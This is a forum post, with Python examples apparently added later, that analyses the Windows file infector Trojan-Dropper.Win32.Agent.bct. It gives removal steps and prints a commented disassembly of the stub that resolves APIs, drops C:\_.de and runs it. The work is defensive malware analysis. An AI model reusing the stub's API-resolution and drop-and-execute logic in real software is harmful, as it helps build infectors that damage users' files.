Author zha0 (zha0)
Board AntiVirus
Title Trojan-Dropper.Win32.Agent.bct, the virus that has been hitting mainland China a lot lately
Time Mon Mar 12 15:59:00 2007
http://blog.uptz.net/article.asp?id=13
Like the Panda virus (熊喵), this one infects *.EXE files, but it does so by adding a section,
whereas Panda used the binder approach.
http://netsecurity.51cto.com/art/200703/41859.htm
-------------------------------------------------
Virus name: Trojan-Dropper.Win32.Agent.bct
Everyone be careful: this virus automatically infects every drive, a bit like the rose virus from a few months ago.
At the time I had not realized I was infected; it was just that, being online these past two days, I felt that going without any protection was like streaking...
This morning I installed 360, then also scrounged a Kaspersky serial number and installed KAV6.
Update, reboot... and then my machine, no, Kaspersky, started braying like a donkey... not just one donkey, a thousand donkeys and ten thousand horses braying!
It was truly spectacular! I was dumbfounded... this many? After only two days???
Looked again: trojans?! Fine... I casually set it to clean on detection without asking.
I came back a while later to check the harvest... sure enough, quite a haul! -- I could scream!
Kaspersky found the viruses, and deleted the infected files right along with them!!
Nearly 25 GB of data and software on drives E and F... everything ending in .exe... all wiped by Kaspersky!
I panicked and rushed online for help... one look, ugh, no dedicated removal tool! For now it is all manual removal... so I looked up their cleanup method and am posting it here.
Let's all take precautions; learn from my mistake!!! Never assume your machine can go naked on the internet!! Make sure to put some clothes on it... I recommend Kaspersky or NOD32.
The method is below:
Creates and runs _.de in the system root directory, creates _.de.bat, deletes itself
Creates x:\windows\system\internat.exe (if a directory of the same name already exists, renames that folder to internat.exe.tmp)
Creates autorun.inf and setup.exe on every drive
Runs the command cmd.exe /c dir <non-system-drive>:\*.exe /s /b >>C:\WINDOWS\win.log
Infects the EXEs listed in win.log
Infected files grow by 26890 bytes
Removal method:
1. Use Task Manager to end the internat.exe process;
2. Delete X:\windows\system\internat.exe;
3. Right-click to open each drive and delete the autorun.inf and setup.exe inside;
4. Create a folder named _.de in the root of the system drive;
5. Scan all hard drives thoroughly with antivirus software; infected files that cannot be repaired may be deleted or kept, as you like.
That way, although the infected EXEs are not repaired yet, the virus will not come back. You can run them and wait until the antivirus is able to clean them.
Second method:
Or save the following as jy.reg and double-click to import it
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\internat.exe]
"Debugger"="internat.exe"
That way internat.exe will not run anymore
Also, for those who have unfortunately been infected and had Kaspersky delete files good and bad alike, my condolences... If you feel manual cleanup still is not safe, wait for a dedicated removal tool. That is all there is; after manual cleanup the .exe files are still infected...
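As an added example (not from the 51cto post and not zha0's code), here is a small Python triage script for the artefacts listed above: it parses the win.log worklist the dropper builds with dir /s /b, checks the documented drop points (autorun.inf and setup.exe on each volume, windows\system\internat.exe on the system drive), and shows why cleanup step 4 works: a folder named _.de at the system root makes the dropper's file creation fail. The drive layout is a fake built in a temporary directory and every path and log line is constructed; the function and constant names are this example's own.

```python
# Added example: triage helpers for the Agent.bct artefacts described above.
# Not the 51cto author's tool; the drive layout and log lines are constructed.
import os
import tempfile

DROPPED_PER_DRIVE = ("autorun.inf", "setup.exe")                  # dropped on every volume
DROPPED_ON_SYSTEM = os.path.join("windows", "system", "internat.exe")
VACCINE_DIR = "_.de"                                               # cleanup step 4

# Constructed sample of the worklist the dropper appends to C:\WINDOWS\win.log
# with "cmd.exe /c dir <drive>:\*.exe /s /b" (one full path per line).
WIN_LOG_SAMPLE = """E:\\tools\\putty.exe
E:\\tools\\readme.txt

F:\\games\\bin\\game.exe
"""


def targets_from_win_log(text):
    """Return the .exe paths in win.log: exactly the files the infector meant to
    touch, so this is the first list to hash and scan during incident response."""
    return [line.strip() for line in text.splitlines()
            if line.strip().lower().endswith(".exe")]


def find_dropped_artifacts(drive_roots, system_root):
    """Report which of the documented drop points exist.
    drive_roots: directories standing in for volume roots;
    system_root: the volume that holds windows\\system."""
    found = []
    for root in drive_roots:
        for name in DROPPED_PER_DRIVE:
            path = os.path.join(root, name)
            if os.path.isfile(path):
                found.append(path)
    path = os.path.join(system_root, DROPPED_ON_SYSTEM)
    if os.path.isfile(path):
        found.append(path)
    return found


def vaccine_blocks_drop(system_root):
    """Why step 4 works: the dropper creates C:\\_.de as a file (CREATE_ALWAYS).
    If a directory already occupies that name the call fails, so the payload is
    never written or executed. Create the directory, then simulate the dropper's
    write with open(); True means the write was refused."""
    path = os.path.join(system_root, VACCINE_DIR)
    os.makedirs(path, exist_ok=True)
    try:
        with open(path, "wb") as fh:  # IsADirectoryError on POSIX, PermissionError on Windows
            fh.write(b"dropper payload")
    except (IsADirectoryError, PermissionError):
        return True
    return False


def build_demo_layout():
    """Construct a fake two-volume machine (C: system, E: data) in a temp dir,
    pre-seeded with the dropped files, for the demo and the self-test."""
    base = tempfile.mkdtemp(prefix="agentbct_")
    sys_root = os.path.join(base, "C")
    data_root = os.path.join(base, "E")
    os.makedirs(os.path.join(sys_root, "windows", "system"))
    os.makedirs(data_root)
    for name in DROPPED_PER_DRIVE:
        open(os.path.join(data_root, name), "wb").close()
    open(os.path.join(sys_root, DROPPED_ON_SYSTEM), "wb").close()
    return sys_root, data_root


if __name__ == "__main__":
    sys_root, data_root = build_demo_layout()
    print("worklist:", targets_from_win_log(WIN_LOG_SAMPLE))
    print("dropped: ", find_dropped_artifacts([sys_root, data_root], sys_root))
    print("vaccine blocks drop:", vaccine_blocks_drop(sys_root))
```

On a real machine the drive roots would be the actual volume letters; the win.log worklist is worth preserving before cleanup, because it records which executables the infector targeted and therefore which ones need to be re-hashed or restored from known-good copies.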
----
Below is my earlier analysis :p
I did not bother analyzing the _.de file >_< it felt pretty boring, nothing technically new .>_<
0042F716 > 55 PUSH EBP ; alloc stack space & backup register
0042F717 8BEC MOV EBP,ESP
0042F719 83C4 D0 ADD ESP,-30
0042F71C 53 PUSH EBX
0042F71D 56 PUSH ESI
0042F71E 57 PUSH EDI
0042F71F 8D75 FC LEA ESI,DWORD PTR SS:[EBP-4]
0042F722 8B4424 30 MOV EAX,DWORD PTR SS:[ESP+30] ; fetch the Kernel32 address off the stack
0042F726 25 0000FFFF AND EAX,FFFF0000
0042F72B 8138 4D5A9000 CMP DWORD PTR DS:[EAX],905A4D ; is it 'MZ'?
0042F731 74 07 JE SHORT Ra2.0042F73A
0042F733 2D 00100000 SUB EAX,1000 ; 4K aligned, so step back 4K at a time
0042F738 ^EB F1 JMP SHORT Ra2.0042F72B ; Loop
0042F73A 8945 FC MOV DWORD PTR SS:[EBP-4],EAX ; save Kernel32 Base Address
0042F73D E8 C8FFFFFF CALL Ra2.0042F70A ; get the virus's own EIP (delta)
0042F742 2D 0A770000 SUB EAX,770A
0042F747 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX
0042F74A 8B06 MOV EAX,DWORD PTR DS:[ESI]
0042F74C 8B40 3C MOV EAX,DWORD PTR DS:[EAX+3C] ; PE Header offset from the DOS stub
0042F74F 0306 ADD EAX,DWORD PTR DS:[ESI]
0042F751 8B40 78 MOV EAX,DWORD PTR DS:[EAX+78] ; RVA of the Export Table
0042F754 0306 ADD EAX,DWORD PTR DS:[ESI]
0042F754 0306 ADD EAX,DWORD PTR DS:[ESI]
0042F756 8BC8 MOV ECX,EAX
0042F758 8B51 20 MOV EDX,DWORD PTR DS:[ECX+20]
0042F75B 0316 ADD EDX,DWORD PTR DS:[ESI]
0042F75D 8B59 24 MOV EBX,DWORD PTR DS:[ECX+24]
0042F760 031E ADD EBX,DWORD PTR DS:[ESI]
0042F762 895D F0 MOV DWORD PTR SS:[EBP-10],EBX
0042F765 8B59 1C MOV EBX,DWORD PTR DS:[ECX+1C]
0042F768 031E ADD EBX,DWORD PTR DS:[ESI]
0042F76A 895D EC MOV DWORD PTR SS:[EBP-14],EBX
0042F76D 8B41 18 MOV EAX,DWORD PTR DS:[ECX+18]
0042F770 8BC8 MOV ECX,EAX
0042F772 49 DEC ECX
0042F773 85C9 TEST ECX,ECX
0042F775 72 5A JB SHORT Ra2.0042F7D1
0042F777 41 INC ECX
0042F778 33C0 XOR EAX,EAX
0042F77A 8BD8 MOV EBX,EAX
0042F77C C1E3 02 SHL EBX,2
0042F77F 03DA ADD EBX,EDX
0042F781 8B3B MOV EDI,DWORD PTR DS:[EBX]
0042F783 033E ADD EDI,DWORD PTR DS:[ESI]
Check whether this export is GetProcAddress
0042F785 813F 47657450 CMP DWORD PTR DS:[EDI],50746547
0042F78B 75 40 JNZ SHORT Ra2.0042F7CD
0042F78D 8BDF MOV EBX,EDI
0042F78F 83C3 04 ADD EBX,4
0042F792 813B 726F6341 CMP DWORD PTR DS:[EBX],41636F72
0042F798 75 33 JNZ SHORT Ra2.0042F7CD
0042F79A 8BDF MOV EBX,EDI
0042F79C 83C3 08 ADD EBX,8
0042F79F 813B 64647265 CMP DWORD PTR DS:[EBX],65726464
0042F7A5 75 26 JNZ SHORT Ra2.0042F7CD
0042F7A7 83C7 0C ADD EDI,0C
0042F7AA 66:813F 7373 CMP WORD PTR DS:[EDI],7373
0042F7AF 75 1C JNZ SHORT Ra2.0042F7CD
0042F7B1 8BD0 MOV EDX,EAX
0042F7B3 03D2 ADD EDX,EDX
0042F7B5 0355 F0 ADD EDX,DWORD PTR SS:[EBP-10]
0042F7B8 0FB712 MOVZX EDX,WORD PTR DS:[EDX]
0042F7BB C1E2 02 SHL EDX,2
0042F7BE 0355 EC ADD EDX,DWORD PTR SS:[EBP-14]
0042F7C1 8B12 MOV EDX,DWORD PTR DS:[EDX]
0042F7C3 0316 ADD EDX,DWORD PTR DS:[ESI]
0042F7C5 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
0042F7C8 8951 04 MOV DWORD PTR DS:[ECX+4],EDX
0042F7CB EB 04 JMP SHORT Ra2.0042F7D1
0042F7CD 40 INC EAX
0042F7CE 49 DEC ECX
0042F7CF ^75 A9 JNZ SHORT Ra2.0042F77A ; not GetProcAddress, try the next name
Once it is found, execution continues below ^____^
0042F7D1 8B5D F4 MOV EBX,DWORD PTR SS:[EBP-C]
0042F7D4 8D43 3B LEA EAX,DWORD PTR DS:[EBX+3B] ; LoadLibrary
0042F7D7 50 PUSH EAX
0042F7D8 8B06 MOV EAX,DWORD PTR DS:[ESI] ; KERNEL32 Address Base
0042F7DA 50 PUSH EAX
0042F7DB FF53 04 CALL DWORD PTR DS:[EBX+4] ; Call GetProcAddress
0042F7DE 8943 08 MOV DWORD PTR DS:[EBX+8],EAX ; 保留 LoadLibrary
0042F7E1 8D43 48 LEA EAX,DWORD PTR DS:[EBX+48] ; FreeLibrary
0042F7E4 50 PUSH EAX
0042F7E5 8B06 MOV EAX,DWORD PTR DS:[ESI]
0042F7E7 50 PUSH EAX
0042F7E8 FF53 04 CALL DWORD PTR DS:[EBX+4]
0042F7EB 8943 0C MOV DWORD PTR DS:[EBX+C],EAX
0042F7EE 8D43 54 LEA EAX,DWORD PTR DS:[EBX+54] ; ExitProcess
0042F7F1 50 PUSH EAX
0042F7F2 8B06 MOV EAX,DWORD PTR DS:[ESI]
0042F7F4 50 PUSH EAX
0042F7F5 FF53 04 CALL DWORD PTR DS:[EBX+4]
0042F7F8 8943 10 MOV DWORD PTR DS:[EBX+10],EAX
0042F7FB 8D43 60 LEA EAX,DWORD PTR DS:[EBX+60] ; GetModuleHandleA
0042F7FE 50 PUSH EAX
0042F7FF 8B06 MOV EAX,DWORD PTR DS:[ESI]
0042F801 50 PUSH EAX
0042F802 FF53 04 CALL DWORD PTR DS:[EBX+4]
0042F805 8943 18 MOV DWORD PTR DS:[EBX+18],EAX
0042F808 8D43 34 LEA EAX,DWORD PTR DS:[EBX+34] ; User32
0042F80B 50 PUSH EAX
0042F80C FF53 08 CALL DWORD PTR DS:[EBX+8] ; call LoadLibrary
0042F80F 8BF8 MOV EDI,EAX
0042F811 893B MOV DWORD PTR DS:[EBX],EDI
0042F813 8D43 71 LEA EAX,DWORD PTR DS:[EBX+71] ; GetMessageA
0042F816 50 PUSH EAX
0042F817 57 PUSH EDI ; user32 base address
0042F818 FF53 04 CALL DWORD PTR DS:[EBX+4] ; call GetProcAddress
0042F81B 8943 1C MOV DWORD PTR DS:[EBX+1C],EAX
0042F81E 8D43 7D LEA EAX,DWORD PTR DS:[EBX+7D] ; TranslateMessage
0042F821 50 PUSH EAX
0042F822 8B03 MOV EAX,DWORD PTR DS:[EBX]
0042F824 50 PUSH EAX
0042F825 FF53 04 CALL DWORD PTR DS:[EBX+4]
0042F828 8943 20 MOV DWORD PTR DS:[EBX+20],EAX
0042F82B 8D83 8E000000 LEA EAX,DWORD PTR DS:[EBX+8E] ; DispatchMessageA
0042F831 50 PUSH EAX
0042F832 8B03 MOV EAX,DWORD PTR DS:[EBX]
0042F834 50 PUSH EAX
0042F835 FF53 04 CALL DWORD PTR DS:[EBX+4] ; call GetProcAddress
0042F838 8943 24 MOV DWORD PTR DS:[EBX+24],EAX
0042F83B 8D83 9F000000 LEA EAX,DWORD PTR DS:[EBX+9F] ; WinExec
0042F841 50 PUSH EAX
0042F842 8B06 MOV EAX,DWORD PTR DS:[ESI]
0042F844 50 PUSH EAX
0042F845 FF53 04 CALL DWORD PTR DS:[EBX+4]
0042F848 8943 14 MOV DWORD PTR DS:[EBX+14],EAX
0042F84B 8D83 A7010000 LEA EAX,DWORD PTR DS:[EBX+1A7] ; CreateFileA
0042F851 50 PUSH EAX
0042F852 8B06 MOV EAX,DWORD PTR DS:[ESI]
0042F854 50 PUSH EAX
0042F855 FF53 04 CALL DWORD PTR DS:[EBX+4]
0042F858 8943 28 MOV DWORD PTR DS:[EBX+28],EAX
0042F85B 8D83 B3010000 LEA EAX,DWORD PTR DS:[EBX+1B3] ; WriteFile
0042F861 50 PUSH EAX
0042F862 8B06 MOV EAX,DWORD PTR DS:[ESI]
0042F864 50 PUSH EAX
0042F865 FF53 04 CALL DWORD PTR DS:[EBX+4]
0042F868 8943 2C MOV DWORD PTR DS:[EBX+2C],EAX
0042F86B 8D83 BD010000 LEA EAX,DWORD PTR DS:[EBX+1BD] ; CloseHandle
0042F871 50 PUSH EAX
0042F872 8B06 MOV EAX,DWORD PTR DS:[ESI]
0042F874 50 PUSH EAX
0042F875 FF53 04 CALL DWORD PTR DS:[EBX+4]
0042F878 8943 30 MOV DWORD PTR DS:[EBX+30],EAX
0042F87B 6A 00 PUSH 0
0042F87D 6A 00 PUSH 0
0042F87F 6A 02 PUSH 2
0042F881 6A 00 PUSH 0
0042F883 6A 01 PUSH 1
0042F885 68 000000C0 PUSH C0000000
0042F88A 8D83 A7000000 LEA EAX,DWORD PTR DS:[EBX+A7] ; filename C:\_.de
0042F890 50 PUSH EAX
0042F891 FF53 28 CALL DWORD PTR DS:[EBX+28] ; call CreateFileA
0042F894 8BF0 MOV ESI,EAX
0042F896 89B3 FA760000 MOV DWORD PTR DS:[EBX+76FA],ESI
0042F89C 6A 00 PUSH 0
0042F89E 8D83 FE760000 LEA EAX,DWORD PTR DS:[EBX+76FE]
0042F8A4 50 PUSH EAX
0042F8A5 68 31750000 PUSH 7531 ; file length
0042F8AA 8D83 C9010000 LEA EAX,DWORD PTR DS:[EBX+1C9] ; offset of the file body to be written
0042F8B0 50 PUSH EAX
0042F8B1 56 PUSH ESI
0042F8B2 FF53 2C CALL DWORD PTR DS:[EBX+2C] ; call WriteFile
0042F8B5 8B83 FA760000 MOV EAX,DWORD PTR DS:[EBX+76FA] ; Get file handle
0042F8BB 50 PUSH EAX
0042F8BC FF53 30 CALL DWORD PTR DS:[EBX+30] ; call CloseHandle
0042F8BF 6A 01 PUSH 1
0042F8C1 8D83 A7000000 LEA EAX,DWORD PTR DS:[EBX+A7]
0042F8C7 50 PUSH EAX
0042F8C8 FF53 14 CALL DWORD PTR DS:[EBX+14] ; call WinExec
0042F8CB 8B83 02770000 MOV EAX,DWORD PTR DS:[EBX+7702] ; base address of the original entry point
0042F8D1 0383 06770000 ADD EAX,DWORD PTR DS:[EBX+7706] ; add the original Entrypoint
0042F8D7 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX
0042F8DA 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]
0042F8DD FFE0 JMP EAX ; jump to the original program
0042F8DF EB 0E JMP SHORT Ra2.0042F8EF ; WM_QUIT Message-Loop
0042F8E1 8D45 D0 LEA EAX,DWORD PTR SS:[EBP-30]
0042F8E4 50 PUSH EAX
0042F8E5 FF53 20 CALL DWORD PTR DS:[EBX+20] ; call TranslateMessage
0042F8E8 8D45 D0 LEA EAX,DWORD PTR SS:[EBP-30]
0042F8EB 50 PUSH EAX
0042F8EC FF53 24 CALL DWORD PTR DS:[EBX+24] ; call DispatchMessageA
0042F8EF 6A 00 PUSH 0
0042F8F1 6A 00 PUSH 0
0042F8F3 6A 00 PUSH 0
0042F8F5 8D45 D0 LEA EAX,DWORD PTR SS:[EBP-30]
0042F8F8 50 PUSH EAX
0042F8F9 FF53 1C CALL DWORD PTR DS:[EBX+1C] ; call GetMessageA
0042F8FC 85C0 TEST EAX,EAX
0042F8FE ^75 E1 JNZ SHORT Ra2.0042F8E1
0042F900 5F POP EDI ; free stack space & restore register
0042F901 5E POP ESI
0042F902 5B POP EBX
0042F903 8BE5 MOV ESP,EBP
0042F905 5D POP EBP
0042F906 C3 RETN
0042F907 8D40 00 LEA EAX,DWORD PTR DS:[EAX]
0042F90A 0000 ADD BYTE PTR DS:[EAX],AL
0042F90C 0000 ADD BYTE PTR DS:[EAX],AL
That covers the drop-and-exec part of the ice stub XD. Next, let's look at the file that _.de produces.
_.de is detected by AntiVir as WORM/Def.BG.3 .....
....... <by this point I had already gone home XDXD>... so there is nothing below CC
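As an added example (not the virus's code and not zha0's), here is the same lookup the stub above performs, re-implemented in Python over a constructed in-memory image so the offsets in the listing can be checked: mask the stack address to 64K and step down 4K at a time until the 'MZ' DWORD (0x00905A4D) matches, then walk the export directory (e_lfanew at 0x3C, export RVA at PE+0x78, NumberOfNames/AddressOfFunctions/AddressOfNames/AddressOfNameOrdinals at +0x18/+0x1C/+0x20/+0x24) comparing names. The fake module, its base (0x10000), and every export and RVA inside build_sample_image() are assumptions; a mapped image is assumed, so RVA + base is a valid address, which is not true of a file on disk without RVA-to-file-offset translation.

```python
# Added example: re-implements the stub's two lookups over a constructed
# in-memory image. Not the virus's code; not a real kernel32; every offset
# and RVA in build_sample_image() is constructed for the demo.
import struct

MZ_DWORD = 0x00905A4D   # bytes 4D 5A 90 00, exactly what the stub's CMP tests


def u32(mem, off):
    return struct.unpack_from("<I", mem, off)[0]


def u16(mem, off):
    return struct.unpack_from("<H", mem, off)[0]


def find_module_base(mem, addr):
    """The AND EAX,FFFF0000 / CMP [EAX],905A4D / SUB EAX,1000 loop of the listing.
    'mem' is the address space (a bytearray); 'addr' is any address inside the module."""
    addr &= 0xFFFF0000
    while addr >= 0:
        if u32(mem, addr) == MZ_DWORD:
            return addr
        addr -= 0x1000
    raise ValueError("no MZ header below the given address")


def resolve_export(mem, base, wanted):
    """Walk IMAGE_EXPORT_DIRECTORY the way the stub does and return the VA of
    the export named 'wanted', or None if the module does not export it."""
    pe = base + u32(mem, base + 0x3C)                 # e_lfanew -> "PE\0\0"
    if mem[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    exp = base + u32(mem, pe + 0x78)                  # DataDirectory[0]: export table RVA
    n_names = u32(mem, exp + 0x18)                    # NumberOfNames
    funcs = base + u32(mem, exp + 0x1C)               # AddressOfFunctions
    names = base + u32(mem, exp + 0x20)               # AddressOfNames
    ords = base + u32(mem, exp + 0x24)                # AddressOfNameOrdinals
    for i in range(n_names):
        name_va = base + u32(mem, names + 4 * i)
        name = mem[name_va:mem.index(b"\0", name_va)]
        if name == wanted:                            # the stub compares 3 DWORDs + 1 WORD
            ordinal = u16(mem, ords + 2 * i)
            return base + u32(mem, funcs + 4 * ordinal)
    return None


def build_sample_image():
    """Constructed stand-in for a mapped kernel32: a 64K-aligned module with a
    three-entry export directory. Returns (address space, module base)."""
    mem = bytearray(0x30000)
    base = 0x10000
    mem[base:base + 4] = b"MZ\x90\x00"
    struct.pack_into("<I", mem, base + 0x3C, 0x80)                # e_lfanew
    pe = base + 0x80
    mem[pe:pe + 4] = b"PE\0\0"
    struct.pack_into("<H", mem, pe + 0x18, 0x10B)                 # PE32 optional header magic
    struct.pack_into("<II", mem, pe + 0x78, 0x200, 0x100)         # export dir RVA, size
    exports = [(b"ExitProcess", 0x1A00), (b"GetProcAddress", 0x1B00), (b"LoadLibraryA", 0x1C00)]
    exp = base + 0x200
    # NumberOfFunctions, NumberOfNames, AddressOfFunctions, AddressOfNames, AddressOfNameOrdinals
    struct.pack_into("<IIIII", mem, exp + 0x14, len(exports), len(exports), 0x2A0, 0x280, 0x2C0)
    name_rva = 0x300
    for i, (name, func_rva) in enumerate(exports):
        struct.pack_into("<I", mem, base + 0x2A0 + 4 * i, func_rva)   # function RVA
        struct.pack_into("<I", mem, base + 0x280 + 4 * i, name_rva)   # name RVA
        struct.pack_into("<H", mem, base + 0x2C0 + 2 * i, i)          # name -> ordinal
        mem[base + name_rva:base + name_rva + len(name) + 1] = name + b"\0"
        name_rva += len(name) + 1
    return mem, base


if __name__ == "__main__":
    mem, base = build_sample_image()
    found = find_module_base(mem, 0x2A5F0)   # pretend this is the return address on the stack
    print(hex(found), hex(resolve_export(mem, found, b"GetProcAddress")))
```

From the defender's side the same details are the fingerprint of this stub: no import table entries for the APIs it uses, a module found by scanning backwards from a stack address, and the API name checked as immediate constants (50746547, 41636F72, 65726464, 7373 in the listing), all of which are easy to pick out in a static scan of an appended section.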
--
--
※ Posted from: 批踢踢實業坊 (ptt.cc)
◆ From: 210.64.110.97
※ Edited: zha0 from: 210.64.110.97 (03/12 16:02)
※ Edited: zha0 from: 210.64.110.97 (03/12 16:03)